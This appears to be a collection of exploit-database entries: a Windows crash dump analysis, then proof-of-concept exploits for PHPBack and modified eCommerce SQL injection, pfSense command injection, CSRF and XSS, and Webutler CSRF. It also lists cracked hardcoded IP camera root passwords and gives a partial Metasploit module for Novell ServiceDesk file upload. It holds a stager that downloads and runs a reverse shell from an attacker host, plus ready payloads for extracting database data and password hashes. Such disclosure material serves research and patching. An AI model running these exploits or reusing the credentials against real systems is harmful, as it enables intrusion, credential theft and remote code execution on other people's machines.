7: kd> !analyze -v

*******************************************************************************

* *

* Bugcheck Analysis *

* *

*******************************************************************************

DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)

An attempt was made to access a pageable (or completely invalid) address at an

interrupt request level (IRQL) that is too high. This is usually

caused by drivers using improper addresses.

If kernel debugger is available get stack backtrace.

Arguments:

Arg1: ffffcf81085c9000, memory referenced

Arg2: 0000000000000002, IRQL

Arg3: 0000000000000001, value 0 = read operation, 1 = write operation

Arg4: fffff8005fad3249, address which referenced memory

Debugging Details:

------------------

DUMP_CLASS: 1

DUMP_QUALIFIER: 401

BUILD_VERSION_STRING: 9600.18146.amd64fre.winblue_ltsb.151121-0600

...

BASEBOARD_VERSION: 

DUMP_TYPE: 1

BUGCHECK_P1: ffffcf81085c9000

BUGCHECK_P2: 2

BUGCHECK_P3: 1

BUGCHECK_P4: fffff8005fad3249

WRITE_ADDRESS: ffffcf81085c9000 Special pool

CURRENT_IRQL: 2

FAULTING_IP: 

vmswitch!memcpy+49

fffff800`5fad3249 8841ff mov byte ptr [rcx-1],al

CPU_COUNT: 8

CPU_MHZ: c88

CPU_VENDOR: GenuineIntel

CPU_FAMILY: 6

CPU_MODEL: 1a

CPU_STEPPING: 4

CPU_MICROCODE: 6,1a,4,0 (F,M,S,R) SIG: 11'00000000 (cache) 11'00000000 (init)

DEFAULT_BUCKET_ID: WIN8_DRIVER_FAULT

BUGCHECK_STR: AV

PROCESS_NAME: System

ANALYSIS_SESSION_HOST: KOSTYAK-G7700

ANALYSIS_SESSION_TIME: 12-31-2015 21:26:14.0206

ANALYSIS_VERSION: 10.0.10586.567 amd64fre

TRAP_FRAME: ffffd00187f46840 -- (.trap 0xffffd00187f46840)

NOTE: The trap frame does not contain all registers.

Some register values may be zeroed or incorrect.

rax=0000000055555500 rbx=0000000000000000 rcx=ffffcf81085c9001

rdx=0000000000001fc0 rsi=0000000000000000 rdi=0000000000000000

rip=fffff8005fad3249 rsp=ffffd00187f469d8 rbp=0000000000000010

r8=0000000000000004 r9=0000000000000000 r10=0000000000000000

r11=ffffcf81085c8fa0 r12=0000000000000000 r13=0000000000000000

r14=0000000000000000 r15=0000000000000000

iopl=0 nv up ei pl nz na pe nc

vmswitch!memcpy+0x49:

fffff800`5fad3249 8841ff mov byte ptr [rcx-1],al ds:ffffcf81`085c9000=??

Resetting default scope

LAST_CONTROL_TRANSFER: from fffff8038a3633e9 to fffff8038a3578a0

STACK_TEXT: 

ffffd001`87f466f8 fffff803`8a3633e9 : 00000000`0000000a ffffcf81`085c9000 00000000`00000002 

00000000`00000001 : nt!KeBugCheckEx

ffffd001`87f46700 fffff803`8a361c3a : 00000000`00000001 ffffe000`57002000 ffffd001`87f46900 

00000000`00000004 : nt!KiBugCheckDispatch+0x69

ffffd001`87f46840 fffff800`5fad3249 : fffff800`5fad9b3d ffffe000`57002000 00000000`0000000c 

ffffe000`57002000 : nt!KiPageFault+0x23a

ffffd001`87f469d8 fffff800`5fad9b3d : ffffe000`57002000 00000000`0000000c ffffe000`57002000 

ffffd001`87f46b00 : vmswitch!memcpy+0x49

ffffd001`87f469e0 fffff800`5fac4792 : 00000000`00000000 ffffd001`87f46ac0 00000000`01000400 

ffffe000`57002000 : vmswitch!VmsMpCommonPvtHandleMulticastOids+0x144fd

ffffd001`87f46a60 fffff800`5fac3dc4 : 00000000`c00000bb 00000000`01010209 ffffcf81`06b62c78 

00000000`000000d0 : vmswitch!VmsMpCommonPvtSetRequestCommon+0x13e

ffffd001`87f46af0 fffff800`5fac3cf9 : ffffcf81`06b62b00 00000000`00000000 fffff800`5fac3a20 

ffffe000`53d8d880 : vmswitch!VmsMpCommonSetRequest+0xa4

ffffd001`87f46b60 fffff800`5fac3e8b : 00000000`00000000 fffff800`00000000 ffffe000`57005c10 

ffff68b8`dcfa8dfd : vmswitch!VmsVmNicPvtRndisDeviceSetRequest+0x55

ffffd001`87f46bb0 fffff800`5fac3aa3 : ffffe000`570c5f70 ffffe000`53d8d9c0 ffffe000`53d8d880 

fffff803`8a29b9f9 : vmswitch!RndisDevHostHandleSetMessage+0x77

ffffd001`87f46bf0 fffff803`8a2ee2a3 : ffffcf81`06b58fb0 ffffe000`57005c10 00000000`00000000 

ffffe000`00000000 : vmswitch!RndisDevHostControlMessageWorkerRoutine+0x83

ffffd001`87f46c20 fffff803`8a2984bf : fffff800`5e842e00 fffff803`8a2ee1a8 ffffe000`53d8d880 

00000000`00000000 : nt!IopProcessWorkItem+0xfb

ffffd001`87f46c90 fffff803`8a305554 : 00000000`00000000 ffffe000`53d8d880 00000000`00000080 

ffffe000`53d8d880 : nt!ExpWorkerThread+0x69f

ffffd001`87f46d40 fffff803`8a35dec6 : ffffd001`88741180 ffffe000`53d8d880 ffffd001`8874d3c0 

00000000`00000000 : nt!PspSystemThreadStartup+0x58

ffffd001`87f46da0 00000000`00000000 : ffffd001`87f47000 ffffd001`87f41000 00000000`00000000 

00000000`00000000 : nt!KiStartSystemThread+0x16

STACK_COMMAND: kb

THREAD_SHA1_HASH_MOD_FUNC: abaf49d1b3c5b02fccc8786e1ffe670ffc7abc52

THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 95f6cd8078b8f21385352dcdeabdb4de53e87ac0

THREAD_SHA1_HASH_MOD: 7e0f522feda778d9b7c0da52391383d6f8569ca6

FOLLOWUP_IP: 

vmswitch!memcpy+49

fffff800`5fad3249 8841ff mov byte ptr [rcx-1],al

FAULT_INSTR_CODE: 75ff4188

SYMBOL_STACK_INDEX: 3

SYMBOL_NAME: vmswitch!memcpy+49

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vmswitch

IMAGE_NAME: vmswitch.sys

DEBUG_FLR_IMAGE_TIMESTAMP: 55c21a2e

BUCKET_ID_FUNC_OFFSET: 49

FAILURE_BUCKET_ID: AV_VRF_vmswitch!memcpy

BUCKET_ID: AV_VRF_vmswitch!memcpy

PRIMARY_PROBLEM_CLASS: AV_VRF_vmswitch!memcpy

TARGET_TIME: 2016-01-01T05:23:07.000Z

OSBUILD: 9600

OSSERVICEPACK: 0

SERVICEPACK_NUMBER: 0

OS_REVISION: 0

SUITE_MASK: 272

PRODUCT_TYPE: 3

OSPLATFORM_TYPE: x64

OSNAME: Windows 8.1

OSEDITION: Windows 8.1 Server TerminalServer SingleUserTS

OS_LOCALE: 

USER_LCID: 0

OSBUILD_TIMESTAMP: 2015-11-21 08:42:09

BUILDDATESTAMP_STR: 151121-0600

BUILDLAB_STR: winblue_ltsb

BUILDOSVER_STR: 6.3.9600.18146.amd64fre.winblue_ltsb.151121-0600

ANALYSIS_SESSION_ELAPSED_TIME: 465

ANALYSIS_SOURCE: KM

FAILURE_ID_HASH_STRING: km:av_vrf_vmswitch!memcpy

FAILURE_ID_HASH: {f6dcfc99-d58f-1ff6-59d1-7239f62b292b}

Followup: MachineOwner

---------
*/
            
/*
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/PHPBACK-v1.3.0-SQL-INJECTION.txt


Vendor:
================
www.phpback.org


Product:
================
PHPBack v1.3.0


Vulnerability Type:
===================
SQL Injection


CVE Reference:
==============
N/A


Vulnerability Details:
=====================

PHPBack v1.3.0 is vulnerable to boolean blind and error based SQL Injection in the 'orderby' parameter.
By sending SQL Injection query using MySQL XPATH function ExtractValue() we can grab information
from the errors generated.

This is useful when the application shows nothing but MySQL errors: we can force data extraction through the error message itself.
ExtractValue() evaluates its second argument as an XPath expression; if that expression is syntactically invalid, MySQL raises an "XPATH syntax error" whose text quotes the offending expression, so any SELECT result concatenated into it is echoed back. Prepending a character that is invalid at the start of an XPath expression (the advisory uses a newline, 0x0a; a colon, 0x3a, works as well) guarantees the parse always FAILS and the extracted data is always shown.
ExtractValue() only exists in MySQL >= 5.1 (5.1.5 and later), so this technique does not work on older servers. A LIMIT clause can then be used to step through the rows of information_schema and other tables one at a time.


Users should upgrade to v1.3.1
https://github.com/ivandiazwm/phpback/releases


Exploit code(s):
===============

Run from CL...
*/

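<?php
error_reporting(0);
#PHPBACK v1.3.0 ORDER BY SQL INJECTION POC
#Credit: hyp3rlinx 
#ISR: apparitionsec
#Site: hyp3rlinx.altervista.org
#///////////////////////////////////////////////////////////////////
#
#run this BOT from CL it does following...
#1) authenticates to target
#2) SQL injection using XPATH query to create error and get output
#   for current MySQL USER(), DATABASE() and VERSION()
#Supported in MySQL >= 5.1 only (ExtractValue() does not exist before 5.1.5)
#
#Usage: php poc.php <email> <password> [host]
#   host defaults to localhost; PHPBack is expected under /phpback-1.3.0/
#====================================================================

if($argc<3){
echo "PHPBack 1.3.0 SQL Injection POC\r\n";
echo "Outputs USER(), DATABASE() and VERSION() on XPATH Error!\r\n";
echo "Supported in MySQL >= 5.1 versions only\r\n";
echo "==========================================================\r\n";
echo "Enter Creds: <email> <password>\r\n";
echo "*** by hyp3rlinx *** \r\n";
exit();
}

$email=$argv[1];
$pwd=$argv[2];
# Optional third argument selects the host; the original hard-coded localhost
# even though it already carried a $target variable.
$target=($argc>3)?$argv[3]:"localhost";
$port=80;

# Form-encode the credentials so that '&', '+', '%' or '=' in the password
# cannot break, or be misread as part of, the POST body.
$creds="email=".urlencode($email)."&password=".urlencode($pwd);

# Send one HTTP/1.0 POST with an application/x-www-form-urlencoded body and
# return the complete response (status line, headers and body). The socket is
# closed before returning; the original never closed the login socket.
function http_post($host,$port,$path,$body,$cookie=""){
    $fp = fsockopen($host, $port, $errno, $errstr, 30);
    sock_chk($fp,$errstr);
    $out = "POST $path HTTP/1.0\r\n";
    $out .= "Host: $host\r\n";
    $out .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $out .= 'Content-Length: ' . strlen($body) . "\r\n";
    if($cookie!==""){ $out .= "Cookie: $cookie\r\n"; }
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out . $body);
    $res="";
    while (!feof($fp)) {
        $res .= fgets($fp, 128);
    }
    fclose($fp);
    return $res;
}

# Pull "PHPSESSID=<id>" out of the login response's Set-Cookie header.
# The original took a fixed 38-byte slice starting at "PHPSESSID", which
# truncates a 32-character session id and returns garbage when the cookie is
# absent; returning "" lets the caller report the failure instead.
function get_session($res){
    if(preg_match('/Set-Cookie:\s*(PHPSESSID=[^;\r\n]+)/i', $res, $m)){
        return $m[1];
    }
    return "";
}

# Abort with the socket error text when fsockopen() failed.
function sock_chk(&$fp,$errstr=""){
    if (!$fp) {echo "Cant connect! $errstr\r\n";exit();}
}

#authenticate
$res=http_post($target,$port,"/phpback-1.3.0/action/login",$creds);
$sess=get_session($res);
if($sess===""){
    echo "No PHPSESSID in login response - wrong credentials or path?\r\n";
    exit();
}

#SQL Injection
# 'orderby' is concatenated into an ORDER BY clause. extractvalue() with an
# XPath that starts with 0x0a is always a syntax error, and the error message
# quotes the expression, so USER(), DATABASE() and VERSION() come back in it.
$sql="search=1&orderby=title,extractvalue(0x0a,concat(0x0a,(select USER()), 0x0a, (select DATABASE()), 0x0a, (select VERSION())))\r\n";

echo http_post($target,$port,"/phpback-1.3.0/admin/ideas",$sql,$sess);

?>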


/*
Disclosure Timeline:
=====================================
Vendor Notification: April 17, 2016
Vendor Confirms: April 17, 2016
Vendor Release Fixed Version: April 19, 2016
April 19, 2016 : Public Disclosure


Exploitation Technique:
=======================
Remote


Severity Level:
================
Medium


Description:
==================================================

Request Method(s):        [+]  POST


Vulnerable Product:       [+] PHPBack v1.3.0


Vulnerable Parameter(s):  [+] 'orderby'

====================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. All content (c) hyp3rlinx.

by hyp3rlinx
*/
            
# Title: Blind Injection modified eCommerce 2.0.0.0 rev 9678
# Date: 16.04.2016
# Category: webapps
# Vendor Homepage: http://www.modified-shop.org/download
# Software Link: http://www.modified-shop.org/forum/index.php?action=downloads;sa=downfile&id=96
# Version: 2.0.0.0 rev 9678
# Tested on: Apache/2.4.7, PHP Version 5.5.9, Linux
# Exploit Author: Felix Maduakor
# Contact: Felix.Maduakor@rub.de
# CVE: CVE-2016-3694

Product Description:
modified eCommerce is an Open Source shopsoftware

Vulnerability Details:
Attackable are the GET-parameters 'orders_status' and 'customers_status' through 'easybillcsv.php':


File: [shoproot]/api/easybill/easybillcsv.php

[24] 		if (isset($_GET['token']) &&  $_GET['token'] == MODULE_EASYBILL_CSV_CRON_TOKEN) {
[25-61] 		...
[62]			} else {
[63]					die('Direct Access to this location is not allowed.');

By default the easybill module is not installed and the constant MODULE_EASYBILL_CSV_CRON_TOKEN is therefore never defined. PHP (before 8.0) treats an undefined constant as the string of its own name and only raises a notice, so the check on line 24 degrades to `$_GET['token'] == 'MODULE_EASYBILL_CSV_CRON_TOKEN'`. As long as the easybill module is not installed, the restriction is bypassed simply by sending that literal string: [Shoproot]/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN


[35]			if (count($_GET['orders_status']) > 0) {
[36]			$_GET['orders_status'] = preg_replace("'[\r\n\s]+'", '', $_GET['orders_status']);
[37]			$orders_status = explode(',', $_GET['orders_status']);
[38]			$module->from_orders_status = implode("', '", $orders_status);
[39]			}


[43]			if (isset($_GET['customers_status'])) {
[44]			$_GET['customers_status'] = preg_replace("'[\r\n\s]+'", '', $_GET['customers_status']);
[45]			$customers_status = explode(',', $_GET['customers_status']);
[46]			$module->from_customers_status = implode("', '", $customers_status);
[47]			}

As you can see in lines 35-39 and 43-47 the GET-parameters 'orders_status' and 'customers_status' are not escaped, but formatted (removed whitespaces, replaced commas with "', '"). They will be set as local variables of the "$module"-object.

File: [shoproot][admin-folder]/includes/modules/system/easybillcsv.php

[63]		$export_query = xtc_db_query("SELECT DISTINCT o.orders_id 
[64]                                    FROM ".TABLE_ORDERS." o
[65]                                    JOIN ".TABLE_ORDERS_STATUS_HISTORY." osh
[66]                                      ON o.orders_id = osh.orders_id	
[67]                                   WHERE (o.orders_status IN ('" . $this->from_orders_status . "') 
[68]                                          OR osh.orders_status_id IN ('" . $this->from_orders_status . "'))
[69]                                     AND (o.last_modified >= '". date( "Y-m-d H:i:s", strtotime($this->from_order_date)) . "'
[70]                                          OR o.date_purchased >= '". date( "Y-m-d H:i:s", strtotime($this->from_order_date)) . "')
[71]                                     AND o.customers_status IN ('" . $this->from_customers_status . "')
[72]                                ORDER BY o.orders_id");


The unescaped GET parameters are placed in the query on lines 67, 68 and 71.
Because the statement ends in an ORDER BY clause that references the table alias (o.orders_id), a UNION-based injection is not possible: whatever is injected must still leave that trailing clause valid, which is why the payloads below comment it out.
The payload may contain neither whitespace nor commas: the preg_replace on lines 36/44 strips every whitespace character, and explode()/implode() turns each comma into the sequence "', '", breaking the injected SQL.

POC [Proof of Concept]:

http://127.0.0.1/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=-111'))or-sleep(5)/*&customers_status=*/%23
Will result in following query and execute the sleep-function for 5 seconds:

SELECT DISTINCT o.orders_id 
                                   FROM ".TABLE_ORDERS." o
                                    JOIN ".TABLE_ORDERS_STATUS_HISTORY." osh
                                      ON o.orders_id = osh.orders_id	
                                   WHERE (o.orders_status IN ('-111'))or-sleep(5)/* 
    
                                    long comment
                                         
                                    */#comment
                               ORDER BY o.orders_id

There are multiple ways to bypass the whitespace/comma-filter. A possible way to check if the first character of the admin-hash is '$' would be:


http://127.0.0.1/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=-111'))or(Select(case(36)when(ascii(substring(`customers_password`FROM(1)FOR(1))))then-sleep(5)End)from`customers`where`customers_id`=1)/*&customers_status=*/%23




Timeline
-----
[16.04.2016] Reporting vulnerability to vendor
            
(    , )     (,
  .   '.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/:wq
                    (x.0)
                  '=.|w|.='
                  _=''"''=.

                presents..

PfSense Community Edition Multiple Vulnerabilities
Affected versions: PfSense Community Edition <= 2.2.6

PDF:
http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf

+-----------+
|Description|
+-----------+
The pfSense community edition firewall is vulnerable to multiple
vulnerabilities, including remote code execution via command injection
as an authenticated non-administrative user, stored and reflected
cross-site scripting.

+------------+
|Exploitation|
+------------+
==Command Injection==
The status_rrd_graph_img.php page is vulnerable to command injection via
the graph GET parameter. A non-administrative authenticated attacker
having access privileges to the graph status functionality can inject
arbitrary operating system commands and execute them in the context of
the root user. Although input validation is performed on the graph
parameter through a regular expression filter, the pipe character is not
removed. Octal characters sequences can be used to encode a payload,
bypass the filter for illegal characters, and create a PHP file to
download and execute a malicious file (i.e. reverse shell) from a remote
attacker controlled host.

[Octal-encoded PHP Stager]
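# Shell command that writes the PHP stager to a file named "shellexec".
# The stager fetches shell.elf from the attacker's host, saves it as
# myshell.elf and executes it. [ATTACKER_IP] must be replaced.
# (The original listing had this string literal wrapped across two lines,
# which is a syntax error in Python; it is one line here.)
stager = (
    'echo \'<?php $shell = file_get_contents("http://[ATTACKER_IP]/shell.elf");' +
    'file_put_contents("myshell.elf", $shell);' +
    'system("chmod 755 myshell.elf && ./myshell.elf"); ?> \' > shellexec'
)


def octal_encode(text):
    """Return ``text`` with every character replaced by a doubly-escaped
    three-digit octal sequence, e.g. ``'A'`` -> ``\\\\101`` (two literal
    backslashes followed by the digits).

    The double backslash survives the shell pipeline in the graph
    parameter so that printf(1) on the firewall sees ``\\101`` and expands
    it back to ``A``; no character that the page's filter rejects has to
    appear in the request.

    The original used ``int(oct(ord(c)))``, which only works on Python 2
    (Python 3's ``oct()`` returns ``'0o101'``, which ``int()`` rejects);
    ``'%03o'`` yields the same zero-padded digits on both.
    """
    return ''.join('\\\\%03o' % ord(c) for c in text)


if __name__ == '__main__':
    print(octal_encode(stager))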

[CSRF POC]
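<html>
<head>
  <script>
    // Step 1: one GET to the vulnerable page, sent with the victim's
    // pfSense cookies (withCredentials). The graph parameter is
    // "file|printf <octal stager>|sh|echo ": the pipe survives the page's
    // character filter, printf(1) expands the octal escapes and sh writes
    // the PHP stager to a file named "shellexec" (see the encoder above).
    // [ENCODED_STAGER] must be replaced with the encoder's output.
    // (In the original listing this string literal was wrapped across two
    // lines, which is an unterminated string in JavaScript.)
    function sploit() {
      var query = "database=-throughput.rrd&graph=file|printf [ENCODED_STAGER]|sh|echo ";
      var xhr = new XMLHttpRequest();
      xhr.open("GET", "https://<target>/status_rrd_graph_img.php?" + query, true);
      xhr.withCredentials = true;
      xhr.send();

      // Step 2 runs on a fixed 2 s timer rather than in xhr.onload: the
      // cross-origin response is not readable from here, and the delay is
      // only a guess at how long step 1 takes on the firewall.
      setTimeout(shellexec, 2000);
    }

    // Step 2: a regular form submission that makes the same page run
    // "php shellexec", i.e. the stager written in step 1.
    function shellexec() {
      document.csrf_exploit_exec.submit();
    }
  </script>
</head>
<body onload="sploit();">
  <form name="csrf_exploit_exec"
        action="https://<target>/status_rrd_graph_img.php">
    <input type="hidden" name="database" value="-throughput.rrd" />
    <input type="hidden" name="graph" value="file|php shellexec|echo " />
  </form>
</body>
</html>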

==Cross-site Scripting==
Multiple instances of stored and reflected cross-scripting
vulnerabilities exist in the web interface of the application. An
authenticated attacker with limited privileges can run arbitrary
JavaScript code in the context of admin users’ session and extend their
access to administrative areas of the application (i.e. command prompt
functionality).

Param   => descr
Method  => POST
URL        => /system_gateways_edit.php
Payload => <script>alert(1)</script>
Render  => /system_gateways_groups_edit.php
Type    => Stored

Param   => container
Method  => POST
URL     => /firewall_shaper_layer7.php
Payload => "><script>alert(1)</script>
Render  => /firewall_shaper_layer7.php
Type    => Reflected

Param   => newname
Method  => POST
URL     => /firewall_shaper_vinterface.php
Payload => "><script>alert(1)</script>
Render  => /firewall_shaper_vinterface.php
Type    => Reflected


+----------+
| Solution |
+----------+
Upgrade to pfSense 2.3. This may be performed in the web interface or
from the console.

+------------+
|  Timeline  |
+------------+
10/02/2016 – Initial disclosure to pfSense.
11/02/2016 – Vendor confirms receipt of advisory and provides fixes.
16/02/2016 – Sent follow up email about public release.
16/02/2016 – Vendor requests advisory disclosure after release of new
software build.
12/04/2016 – Release of patched software build and vendor disclosure of
security advisories.
15/04/2016 – Public disclosure of security advisory.

+------------+
| Additional |
+------------+
Further information is available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf

+------------+
| References |
+------------+
https://www.pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc
https://www.pfsense.org/security/advisories/pfSense-SA-16_02.webgui.asc
            
Exploit Title: TH692- Outdoor P2P HD Waterproof IP Camera hardcoded credentials
Date: 4/16/2016
Exploit Author: DLY
Vendor: TENVIS Technology Co., Ltd
Product: TH692- Outdoor P2P HD Waterproof IP Camera
Product webpage: http://www.tenvis.com/th-692-outdoor-p2p-hd-waterproof-ip-camera-p-230.html
Affected version: TH692C-V. 16.1.16.1.1.4
firmware download link: http://download.tenvis.com/files/updatefiles/UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov

user: Mroot
pass:cat1029
user:Wproot
pass: cat1029

root@kali:~# strings UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov.1 | grep root
rootpath
rootfs crc %lx
------------------start upgrade rootfs------------------
------------------end upgrade rootfs------------------
bootargs=mem=74M console=ttyAMA0,115200 root=/dev/mtdblock2 rootfstype=jffs2 mtdparts=hi_sfc:256K(boot),2560K(kernel),11520K(rootfs),1M(config),64K(key),960K(ext)
nfsroot
7root
Bmount -t nfs -o nolock 192.168.0.99:/home/bt/vvvipc_develop/rootfs_target /nfsroot
k01000100    rootbox    nohelp info
root::0:
Mroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh
Wproot:$1$d3VPdE0x$Ztn09cyReJy5PynZgwCbw0:0:0::/root:/bin/sh
nfsroot
pivot_root
xswitch_root
chroot
nfsroot
root@kali:~# john --show ipcamhashes
Mroot:cat1029:0:0::/root:/bin/sh
Wproot:cat1029:0:0::/root:/bin/sh

2 password hashes cracked, 0 left
            
Dear OffSec,

Here is the vulnerability detail as I submitted

*# Exploit Title: Webutler CMS Cross-Site Request Forgery*
*# Date: 18 April 2016*
*# Exploit Author: Keerati T. (Post)*
*# Vendor Homepage: http://webutler.de/en <http://webutler.de/en>*
*# Software Link: http://webutler.de/download/webutler_v3.2.zip
<http://webutler.de/download/webutler_v3.2.zip>*
*# Version: 3.2*
*# Tested on: Linux*

*1.Description*
The Webutler is a simple online page editor for static HTML files.
Webmasters can provide a simple login option for image and text editing to
their customers. The Webutler is a tool for websites or projects to be
implemented with a small effort. The project has grown over the years and
now you can do a lot of things with it.
None of the administrative functions verify that a request was deliberately issued by the logged-in user: there is no anti-CSRF token and no origin check, so any site can submit an HTML form to them. The attack succeeds when a logged-in administrator visits a malicious page containing such a form; the browser attaches the admin's session cookie and the request is processed.


*2. Proof of Concept*
Only change password function PoC, But other function (add page, delete
page, etc..) can be exploited.

<html>
  <body>
    <!-- Auto-submitting POST to Webutler's user-save endpoint. Per the
         advisory, nothing except the browser-attached session cookie ties
         the request to the admin, so a logged-in admin who merely loads
         this page gets the "root" password reset to 111111. -->
    <form action="http://10.0.0.102/webutler/admin/system/save.php"
method="POST">
      <input type="hidden" name="saveuser" value="1" />
      <!-- administrator user name is "root" -->
      <input type="hidden" name="username" value="root" />
      <!-- new password, supplied twice as the change-password form expects -->
      <input type="hidden" name="userpass1" value="111111" />
      <input type="hidden" name="userpass2" value="111111" />
      <input type="hidden" name="userlang" value="en" />
    </form>
  </body>
  <!-- submit as soon as the page is parsed; no user interaction needed -->
  <script>document.forms[0].submit();</script>
</html>


*3. Timeline*
11 Apr 2016 - Vulnerability discover.
11 Apr 2016 - No main contact available on vendor web page. Ask related
contact that shown on vendor web page instead.
18 Apr 2016 - No response from related contact and vulnerability disclosed.
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  include Msf::Exploit::EXE

  # Module metadata and user-tunable options.
  #
  # Targets: index 0 is auto-detection, 1 is Linux and 2 is Windows.
  # pick_target assigns @my_target by index (targets[1] / targets[2]), so the
  # order of this array must not change.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Novell ServiceDesk Authenticated File Upload',
      'Description'    => %q{
        This module exploits an authenticated arbitrary file upload via directory traversal
        to execute code on the target. It has been tested on versions 6.5 and 7.1.0, in
        Windows and Linux installations of Novell ServiceDesk, as well as the Virtual
        Appliance provided by Novell.
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2016-1593' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/novell-service-desk-7.1.0.txt' ],
          [ 'URL', 'http://seclists.org/bugtraq/2016/Apr/64' ]
        ],
      'Platform'    => %w{ linux win },
      'Arch'           => ARCH_X86,
      # the JSP dropper writes, chmods and runs a native file; give it time
      'DefaultOptions' => { 'WfsDelay' => 15 },
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'Novell ServiceDesk / Linux',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86
            }
          ],
          [ 'Novell ServiceDesk / Windows',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
        ],
      'Privileged'     => false,  # Privileged on Windows but not on (most) Linux targets
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 30 2016'
    ))

    # USERNAME/PASSWORD default to admin/admin; the upload is only reachable
    # after a successful login.
    # TRAVERSAL_PATH is optional: when unset, pick_target tries the Virtual
    # Appliance path and the Windows/Linux self-install path in turn.
    register_options(
      [
        OptPort.new('RPORT',
          [true, 'The target port', 80]),
        OptString.new('USERNAME',
          [true, 'The username to login as', 'admin']),
        OptString.new('PASSWORD',
          [true, 'Password for the specified username', 'admin']),
        OptString.new('TRAVERSAL_PATH',
          [false, 'Traversal path to tomcat/webapps/LiveTime/'])
      ], self.class)
  end


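  # Scrape the version number shown on the LiveTime login page.
  #
  # Returns the "Version #x.y.z" marker converted with to_f, so "7.1.0"
  # becomes 7.1 and "6.5" becomes 6.5; check and exploit compare it as a
  # float. Returns the sentinel 999 when the page cannot be fetched or
  # carries no version marker (check maps that to Safe).
  def get_version
    res = send_request_cgi({
      'uri'    => normalize_uri('LiveTime', 'WebObjects', 'LiveTime.woa'),
      'method' => 'GET',
      'headers' => {
        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
      }
    })

    # The original pattern began with "\V", which is not a defined regexp
    # escape; Ruby's engine appears to have matched it as a literal "V", so
    # spell the literal out rather than rely on that.
    if res && res.code == 200 && res.body.to_s =~ /<p class="login-version-title">Version \#([0-9.]+)<\/p>/
      $1.to_f
    else
      999
    end
  end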


  # Map the scraped version onto a CheckCode: 6.5..7.1 inclusive is
  # Appears, anything newer is Safe, anything else (including the 999
  # sentinel is NOT here - it is > 7.1 and therefore Safe) is Unknown.
  def check
    version = get_version

    if version > 7.1
      Exploit::CheckCode::Safe
    elsif version >= 6.5
      # here version <= 7.1 is already known
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Unknown
    end
  end


  # Resolve the 'Automatic' target by uploading an OS-probe JSP through each
  # candidate traversal path and fetching it back; the first path that serves
  # the probe is returned (and @my_target set from the reported OS name).
  # Returns nil when no candidate path worked. Only the probe that succeeded
  # is registered for cleanup.
  def pick_target
    return target unless target.name == 'Automatic'

    print_status("#{peer} - Determining target")

    # JSP that prints the JVM's OS name; "Windows" in the body means targets[2].
    probe = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}

    candidates = []
    # user-supplied path first, if any
    candidates << datastore['TRAVERSAL_PATH'] if datastore['TRAVERSAL_PATH']
    # then the Virtual Appliance path and the Windows/Linux self-install path
    candidates += ['../../srv/tomcat6/webapps/LiveTime/', '../../Server/webapps/LiveTime/']

    candidates.each do |path|
      probe_name = upload_jsp(path, probe)

      res = send_request_cgi({
        'uri'    => normalize_uri('LiveTime', probe_name),
        'method' => 'GET',
        'headers' => {
          'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
        },
        'cookie' => @cookies
      })

      next unless res && res.code == 200

      @my_target = (res.body.to_s =~ /Windows/) ? targets[2] : targets[1]

      cleanup_dir =
        if path.include?('/srv/tomcat6/webapps/')
          '/srv/tomcat6/webapps/LiveTime/'
        else
          '../webapps/LiveTime/'
        end
      register_files_for_cleanup(cleanup_dir + probe_name)

      return path
    end

    nil
  end


  # Upload a JSP through the import form (@upload_url / @upload_form), using
  # the multipart filename field to traverse into the LiveTime webapp
  # directory. Returns the random name the file was given; the caller fetches
  # it as /LiveTime/<name>. Aborts the module when the upload request fails.
  def upload_jsp(traversal_path, jsp)
    jsp_name = Rex::Text.rand_text_alpha(6 + rand(8)) + ".jsp"

    mime = Rex::MIME::Message.new
    disposition = "form-data; name=\"#{@upload_form}\"; filename=\"#{traversal_path}#{jsp_name}\""
